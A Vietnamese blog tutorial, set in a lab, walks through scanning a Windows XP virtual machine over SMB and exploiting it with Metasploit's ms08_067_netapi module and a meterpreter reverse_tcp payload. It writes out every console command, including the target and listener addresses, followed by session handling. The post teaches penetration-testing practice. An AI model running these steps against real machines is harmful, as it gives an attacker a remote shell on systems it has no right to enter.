Ở bài trước mình đã nêu những bước cơ bản để sử dụng Metasploit khai thác một lỗi bảo mật. Còn bây giờ ta sẽ thực hành trên lab, sử dụng lỗ hỏng ms08_067_netapi và payload meterpreter để khai thác vào Windows XP.
Trước tiên thì ta hãy dùng quét phiên bản windows cũng qua lỗ hỏng smb.
msf > use auxiliary/scanner/smb/smb_version
smb_version
Xem các thiết lập cần thiết cho exploit này.
msf auxiliary(smb_version) > show options
smb_version > show options
Bạn nhìn ở trên, yêu cầu tham số RHOSTS phải có (cột Required là yes), và cột Current Setting còn trống vì vậy ta phải thiết lập cho nó. Mục tiêu tấn công của ta là máy ảo Windows XP, vì vậy hãy điền IP của nó vào.
msf auxiliary(smb_version) > set RHOSTS 172.16.100.5
smb_version > set RHOSTS
Và bắt đầu quét:
msf auxiliary(smb_version) > exploit
exploit smb_version
Vậy là ta đã có được phiên bản hệ điều hành của mục tiêu: Windows XP SP0 / 1 (language:English).
Sử dụng exploit ms08_067_netapi:
Tiếp theo ta sẽ thực hiện tấn công qua exploit ms08_067_netapi:
msf auxiliary(smb_version) > use exploit/windows/smb/ms08_067_netapi
ms08_067_netapi
Xem các tham số cần thiết cho exploit này:
msf exploit(ms08_067_netapi) > show options
ms08_067_netapi > show options
Tham số RHOST được yêu cầu chính là địa chỉ của mục tiêu:
msf exploit(ms08_067_netapi) > set RHOST 172.16.100.5
ms08_067_netapi > set RHOST
Chọn payload và thiết lập tham số:
Sau khi thiếp lập xong hãy kiểm tra lại, và chọn một payload. Mình sẽ sử dụng payload meterpreter/reverse_tcp:
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
ms08_067_netapi > show options
Thiết lập tham số LHOST là máy đang chạy Metasploit.
msf exploit(ms08_067_netapi) > set LHOST 172.16.100.2
ms08_067_netapi > set LHOST
Xác định mục tiêu tấn công:
msf exploit(ms08_067_netapi) > show targets
ms08_067_netapi > show target
Ở trên ta không tìm thấy cái tùy chọn đúng như phiên bản hệ điều hành có được ở rên, tuy nhiên có cái lựa chọn Windows XP SP0/SP1 Universal là gần giống, vậy ta cứ để Automatic Targeting:
msf exploit(ms08_067_netapi) > set target 0
Bắt đầu cho chạy exploit:
msf exploit(ms08_067_netapi) > exploit
ms08_067_netapi > exploit
Sau khi exploit thành công, Metasploit sẽ chạy payload được chọn, và lúc này là meterpreter shell, mình sẽ hướng dẫn sử dụng payload này ở phần sau, ta hãy thử vài lệnh nào!
Thử sử dụng payload:
Lệnh background trên meterpreter cho phép ta lưu lại session (phiên làm việc) và trở về Metasploit để tiếp tục làm việc trên Metasploit:
meterpreter > background
Kiểm tra các session đang chạy:
Để xem lại các session đang mở ta hãy gõ:
msf exploit(ms08_067_netapi) > sessions
ms08_067_netapi > sessions
Mở lại session:
Các thông tin của session sẽ được hiển thị ra, muốn truy cập lại vào session nào thì ta hãy dùng lệnh:
msf exploit(ms08_067_netapi) > sessions -i <ID>
sessions -i
Thoát ra:
Và cuối cùng tắt session hay thoát khỏi Metasploit ta dùng exit nhé.
exit metasploit
Lời kết:
Qua bài này ta đã hiểu rõ hơn về cách mà Metasploit hoạt động, từ đó ta có thể dễ dàng tìm hiểu thêm về các exploit và payload khác để thực hiện tấn công. Ở bài viết tiếp theo của series này mình sẽ hướng dẫn về payload meterpreter để sử dụng điều khiển và chiếm quyền hệ thống của mục tiêu.
0 nhận xét :
Post a Comment